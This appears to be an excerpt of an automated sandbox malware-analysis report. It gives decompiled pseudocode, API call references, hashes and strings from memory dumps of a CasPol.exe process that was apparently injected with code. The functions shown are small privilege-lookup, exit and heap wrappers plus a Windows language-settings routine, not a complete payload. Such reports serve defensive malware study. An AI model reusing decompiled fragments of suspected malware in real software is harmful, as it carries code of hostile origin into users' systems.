                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041EA03(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                                                                                                                                                                				int _t10;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x6d4)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x6d4)), 0, 0x46);
                                                                                                                                                                                                                                                                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                				return _t10;
                                                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                                                                                                                                                                                                                                                • Instruction ID: 26638fb517edf30d6313ba082fa82f18f9a37f2b762b1a37e3fac1042cbd1374
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E01AB56002086BC710DF89DC45EE737ADAF88654F014065FE0857242C635E8148BB5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                			E0041E8D7(intOrPtr _a4, int _a8) {
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				asm("adc eax, 0xbb2eba75");
                                                                                                                                                                                                                                                                                                				_t7 = _a4;
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
                                                                                                                                                                                                                                                                                                				ExitProcess(_a8);
                                                                                                                                                                                                                                                                                                			}




                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E8E3(intOrPtr _a4, int _a8) {
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t5 = _a4;
                                                                                                                                                                                                                                                                                                				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
                                                                                                                                                                                                                                                                                                				ExitProcess(_a8);
                                                                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                                                                0x0041e8e6
                                                                                                                                                                                                                                                                                                0x0041e8fd
                                                                                                                                                                                                                                                                                                0x0041e90b

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017DB314
                                                                                                                                                                                                                                                                                                • The resource is owned shared by %d threads, xrefs: 017DB37E
                                                                                                                                                                                                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017DB2F3
                                                                                                                                                                                                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017DB2DC
                                                                                                                                                                                                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017DB39B
                                                                                                                                                                                                                                                                                                • an invalid address, %p, xrefs: 017DB4CF
                                                                                                                                                                                                                                                                                                • write to, xrefs: 017DB4A6
                                                                                                                                                                                                                                                                                                • <unknown>, xrefs: 017DB27E, 017DB2D1, 017DB350, 017DB399, 017DB417, 017DB48E
                                                                                                                                                                                                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 017DB432
                                                                                                                                                                                                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 017DB3C5
                                                                                                                                                                                                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017DB53F
                                                                                                                                                                                                                                                                                                • The critical section is owned by thread %p., xrefs: 017DB3B9
                                                                                                                                                                                                                                                                                                • *** then kb to get the faulting stack, xrefs: 017DB51C
                                                                                                                                                                                                                                                                                                • *** enter .cxr %p for the context, xrefs: 017DB50D
                                                                                                                                                                                                                                                                                                • This failed because of error %Ix., xrefs: 017DB446
                                                                                                                                                                                                                                                                                                • *** Inpage error in %ws:%s, xrefs: 017DB418
                                                                                                                                                                                                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017DB305
                                                                                                                                                                                                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 017DB374
                                                                                                                                                                                                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 017DB352
                                                                                                                                                                                                                                                                                                • The instruction at %p tried to %s , xrefs: 017DB4B6
                                                                                                                                                                                                                                                                                                • read from, xrefs: 017DB4AD, 017DB4B2
                                                                                                                                                                                                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017DB47D
                                                                                                                                                                                                                                                                                                • *** enter .exr %p for the exception record, xrefs: 017DB4F1
                                                                                                                                                                                                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017DB38F
                                                                                                                                                                                                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017DB323
                                                                                                                                                                                                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017DB476
                                                                                                                                                                                                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 017DB48F
                                                                                                                                                                                                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017DB484
                                                                                                                                                                                                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017DB3D6
                                                                                                                                                                                                                                                                                                • a NULL pointer, xrefs: 017DB4E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                                                                                                                                                                • API String ID: 0-108210295
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                                			E01733D34(signed int* __ecx) {
                                                                                                                                                                                                                                                                                                				signed int* _v8;
                                                                                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                                                                                				signed int* _v16;
                                                                                                                                                                                                                                                                                                				signed int* _v20;
                                                                                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                                                                                                                				signed int* _v48;
                                                                                                                                                                                                                                                                                                				signed int* _v52;
                                                                                                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                                                                                                				signed int _v60;
                                                                                                                                                                                                                                                                                                				char _v68;
                                                                                                                                                                                                                                                                                                				signed int _t140;
                                                                                                                                                                                                                                                                                                				signed int _t161;
                                                                                                                                                                                                                                                                                                				signed int* _t236;
                                                                                                                                                                                                                                                                                                				signed int* _t242;
                                                                                                                                                                                                                                                                                                				signed int* _t243;
                                                                                                                                                                                                                                                                                                				signed int* _t244;
                                                                                                                                                                                                                                                                                                				signed int* _t245;
                                                                                                                                                                                                                                                                                                				signed int _t255;
                                                                                                                                                                                                                                                                                                				void* _t257;
                                                                                                                                                                                                                                                                                                				signed int _t260;
                                                                                                                                                                                                                                                                                                				void* _t262;
                                                                                                                                                                                                                                                                                                				signed int _t264;
                                                                                                                                                                                                                                                                                                				void* _t267;
                                                                                                                                                                                                                                                                                                				signed int _t275;
                                                                                                                                                                                                                                                                                                				signed int* _t276;
                                                                                                                                                                                                                                                                                                				short* _t277;
                                                                                                                                                                                                                                                                                                				signed int* _t278;
                                                                                                                                                                                                                                                                                                				signed int* _t279;
                                                                                                                                                                                                                                                                                                				signed int* _t280;
                                                                                                                                                                                                                                                                                                				short* _t281;
                                                                                                                                                                                                                                                                                                				signed int* _t282;
                                                                                                                                                                                                                                                                                                				short* _t283;
                                                                                                                                                                                                                                                                                                				signed int* _t284;
                                                                                                                                                                                                                                                                                                				void* _t285;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_v60 = _v60 | 0xffffffff;
                                                                                                                                                                                                                                                                                                				_t280 = 0;
                                                                                                                                                                                                                                                                                                				_t242 = __ecx;
                                                                                                                                                                                                                                                                                                				_v52 = __ecx;
                                                                                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                                                                                				_v44 = 0;
                                                                                                                                                                                                                                                                                                				_v56 = 0;
                                                                                                                                                                                                                                                                                                				_t275 = 0;
                                                                                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                                                                                                					_t280 = 0xc000000d;
                                                                                                                                                                                                                                                                                                					_t140 = 0;
                                                                                                                                                                                                                                                                                                					L50:
                                                                                                                                                                                                                                                                                                					 *_t242 =  *_t242 | 0x00000800;
                                                                                                                                                                                                                                                                                                					_t242[0x13] = _t140;
                                                                                                                                                                                                                                                                                                					_t242[0x16] = _v40;
                                                                                                                                                                                                                                                                                                					_t242[0x18] = _v28;
                                                                                                                                                                                                                                                                                                					_t242[0x14] = _v32;
                                                                                                                                                                                                                                                                                                					_t242[0x17] = _t275;
                                                                                                                                                                                                                                                                                                					_t242[0x15] = _v44;
                                                                                                                                                                                                                                                                                                					_t242[0x11] = _v56;
                                                                                                                                                                                                                                                                                                					_t242[0x12] = _v60;
                                                                                                                                                                                                                                                                                                					return _t280;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(E01731B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                                                                                                                                                                                                					_v56 = 1;
                                                                                                                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_v8 = _t280;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(E01731B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                                                                                                                                                                                                					_v60 =  *_v8;
                                                                                                                                                                                                                                                                                                					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                                                                                                                                                                                                                                					_v8 = _t280;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(E01731B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                                                                                                                                                                                                					L16:
                                                                                                                                                                                                                                                                                                					if(E01731B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                                                                                                                                                                                                						L28:
                                                                                                                                                                                                                                                                                                						if(E01731B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                                                                                                                                                                                                							L46:
                                                                                                                                                                                                                                                                                                							_t275 = _v16;
                                                                                                                                                                                                                                                                                                							L47:
                                                                                                                                                                                                                                                                                                							_t161 = 0;
                                                                                                                                                                                                                                                                                                							L48:
                                                                                                                                                                                                                                                                                                							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                								L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t140 = _v20;
                                                                                                                                                                                                                                                                                                							if(_t140 != 0) {
                                                                                                                                                                                                                                                                                                								if(_t275 != 0) {
                                                                                                                                                                                                                                                                                                									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                                                                                                                                                                                                                                									_t275 = 0;
                                                                                                                                                                                                                                                                                                									_v28 = 0;
                                                                                                                                                                                                                                                                                                									_t140 = _v20;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L50;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t167 = _v12;
                                                                                                                                                                                                                                                                                                						_t255 = _v12 + 4;
                                                                                                                                                                                                                                                                                                						_v44 = _t255;
                                                                                                                                                                                                                                                                                                						if(_t255 == 0) {
                                                                                                                                                                                                                                                                                                							_t276 = _t280;
                                                                                                                                                                                                                                                                                                							_v32 = _t280;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t276 = L01744620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                                                                                                                                                                                                                                							_t167 = _v12;
                                                                                                                                                                                                                                                                                                							_v32 = _t276;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						if(_t276 == 0) {
                                                                                                                                                                                                                                                                                                							_v44 = _t280;
                                                                                                                                                                                                                                                                                                							_t280 = 0xc0000017;
                                                                                                                                                                                                                                                                                                							goto L46;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							E0176F3E0(_t276, _v8, _t167);
                                                                                                                                                                                                                                                                                                							_v48 = _t276;
                                                                                                                                                                                                                                                                                                							_t277 = E01771370(_t276, 0x1704e90);
                                                                                                                                                                                                                                                                                                							_pop(_t257);
                                                                                                                                                                                                                                                                                                							if(_t277 == 0) {
                                                                                                                                                                                                                                                                                                								L38:
                                                                                                                                                                                                                                                                                                								_t170 = _v48;
                                                                                                                                                                                                                                                                                                								if( *_v48 != 0) {
                                                                                                                                                                                                                                                                                                									E0176BB40(0,  &_v68, _t170);
                                                                                                                                                                                                                                                                                                									if(L017343C0( &_v68,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                										_t280 =  &(_t280[0]);
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								if(_t280 == 0) {
                                                                                                                                                                                                                                                                                                									_t280 = 0;
                                                                                                                                                                                                                                                                                                									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                                                                                                                                                                                                                                									_v44 = 0;
                                                                                                                                                                                                                                                                                                									_v32 = 0;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									_t280 = 0;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t174 = _v8;
                                                                                                                                                                                                                                                                                                								if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_v8 = _t280;
                                                                                                                                                                                                                                                                                                								goto L46;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t243 = _v48;
                                                                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                                                                								 *_t277 = 0;
                                                                                                                                                                                                                                                                                                								_t278 = _t277 + 2;
                                                                                                                                                                                                                                                                                                								E0176BB40(_t257,  &_v68, _t243);
                                                                                                                                                                                                                                                                                                								if(L017343C0( &_v68,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                									_t280 =  &(_t280[0]);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t243 = _t278;
                                                                                                                                                                                                                                                                                                								_t277 = E01771370(_t278, 0x1704e90);
                                                                                                                                                                                                                                                                                                								_pop(_t257);
                                                                                                                                                                                                                                                                                                							} while (_t277 != 0);
                                                                                                                                                                                                                                                                                                							_v48 = _t243;
                                                                                                                                                                                                                                                                                                							_t242 = _v52;
                                                                                                                                                                                                                                                                                                							goto L38;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t191 = _v12;
                                                                                                                                                                                                                                                                                                					_t260 = _v12 + 4;
                                                                                                                                                                                                                                                                                                					_v28 = _t260;
                                                                                                                                                                                                                                                                                                					if(_t260 == 0) {
                                                                                                                                                                                                                                                                                                						_t275 = _t280;
                                                                                                                                                                                                                                                                                                						_v16 = _t280;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t275 = L01744620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                                                                                                                                                                                                                                						_t191 = _v12;
                                                                                                                                                                                                                                                                                                						_v16 = _t275;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(_t275 == 0) {
                                                                                                                                                                                                                                                                                                						_v28 = _t280;
                                                                                                                                                                                                                                                                                                						_t280 = 0xc0000017;
                                                                                                                                                                                                                                                                                                						goto L47;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						E0176F3E0(_t275, _v8, _t191);
                                                                                                                                                                                                                                                                                                						_t285 = _t285 + 0xc;
                                                                                                                                                                                                                                                                                                						_v48 = _t275;
                                                                                                                                                                                                                                                                                                						_t279 = _t280;
                                                                                                                                                                                                                                                                                                						_t281 = E01771370(_v16, 0x1704e90);
                                                                                                                                                                                                                                                                                                						_pop(_t262);
                                                                                                                                                                                                                                                                                                						if(_t281 != 0) {
                                                                                                                                                                                                                                                                                                							_t244 = _v48;
                                                                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                                                                								 *_t281 = 0;
                                                                                                                                                                                                                                                                                                								_t282 = _t281 + 2;
                                                                                                                                                                                                                                                                                                								E0176BB40(_t262,  &_v68, _t244);
                                                                                                                                                                                                                                                                                                								if(L017343C0( &_v68,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                									_t279 =  &(_t279[0]);
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t244 = _t282;
                                                                                                                                                                                                                                                                                                								_t281 = E01771370(_t282, 0x1704e90);
                                                                                                                                                                                                                                                                                                								_pop(_t262);
                                                                                                                                                                                                                                                                                                							} while (_t281 != 0);
                                                                                                                                                                                                                                                                                                							_v48 = _t244;
                                                                                                                                                                                                                                                                                                							_t242 = _v52;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t201 = _v48;
                                                                                                                                                                                                                                                                                                						_t280 = 0;
                                                                                                                                                                                                                                                                                                						if( *_v48 != 0) {
                                                                                                                                                                                                                                                                                                							E0176BB40(_t262,  &_v68, _t201);
                                                                                                                                                                                                                                                                                                							if(L017343C0( &_v68,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                								_t279 =  &(_t279[0]);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						if(_t279 == 0) {
                                                                                                                                                                                                                                                                                                							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                                                                                                                                                                                                                                							_v28 = _t280;
                                                                                                                                                                                                                                                                                                							_v16 = _t280;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t202 = _v8;
                                                                                                                                                                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_v8 = _t280;
                                                                                                                                                                                                                                                                                                						goto L28;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t214 = _v12;
                                                                                                                                                                                                                                                                                                				_t264 = _v12 + 4;
                                                                                                                                                                                                                                                                                                				_v40 = _t264;
                                                                                                                                                                                                                                                                                                				if(_t264 == 0) {
                                                                                                                                                                                                                                                                                                					_v20 = _t280;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t236 = L01744620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                                                                                                                                                                                                                                					_t280 = _t236;
                                                                                                                                                                                                                                                                                                					_v20 = _t236;
                                                                                                                                                                                                                                                                                                					_t214 = _v12;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(_t280 == 0) {
                                                                                                                                                                                                                                                                                                					_t161 = 0;
                                                                                                                                                                                                                                                                                                					_t280 = 0xc0000017;
                                                                                                                                                                                                                                                                                                					_v40 = 0;
                                                                                                                                                                                                                                                                                                					goto L48;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					E0176F3E0(_t280, _v8, _t214);
                                                                                                                                                                                                                                                                                                					_t285 = _t285 + 0xc;
                                                                                                                                                                                                                                                                                                					_v48 = _t280;
                                                                                                                                                                                                                                                                                                					_t283 = E01771370(_t280, 0x1704e90);
                                                                                                                                                                                                                                                                                                					_pop(_t267);
                                                                                                                                                                                                                                                                                                					if(_t283 != 0) {
                                                                                                                                                                                                                                                                                                						_t245 = _v48;
                                                                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                                                                							 *_t283 = 0;
                                                                                                                                                                                                                                                                                                							_t284 = _t283 + 2;
                                                                                                                                                                                                                                                                                                							E0176BB40(_t267,  &_v68, _t245);
                                                                                                                                                                                                                                                                                                							if(L017343C0( &_v68,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                								_t275 = _t275 + 1;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							_t245 = _t284;
                                                                                                                                                                                                                                                                                                							_t283 = E01771370(_t284, 0x1704e90);
                                                                                                                                                                                                                                                                                                							_pop(_t267);
                                                                                                                                                                                                                                                                                                						} while (_t283 != 0);
                                                                                                                                                                                                                                                                                                						_v48 = _t245;
                                                                                                                                                                                                                                                                                                						_t242 = _v52;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t224 = _v48;
                                                                                                                                                                                                                                                                                                					_t280 = 0;
                                                                                                                                                                                                                                                                                                					if( *_v48 != 0) {
                                                                                                                                                                                                                                                                                                						E0176BB40(_t267,  &_v68, _t224);
                                                                                                                                                                                                                                                                                                						if(L017343C0( &_v68,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                							_t275 = _t275 + 1;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					if(_t275 == 0) {
                                                                                                                                                                                                                                                                                                						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                                                                                                                                                                                                                                						_v40 = _t280;
                                                                                                                                                                                                                                                                                                						_v20 = _t280;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t225 = _v8;
                                                                                                                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                						L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_v8 = _t280;
                                                                                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                                                                                0x01733d5f
                                                                                                                                                                                                                                                                                                0x01733d61
                                                                                                                                                                                                                                                                                                0x01733d66
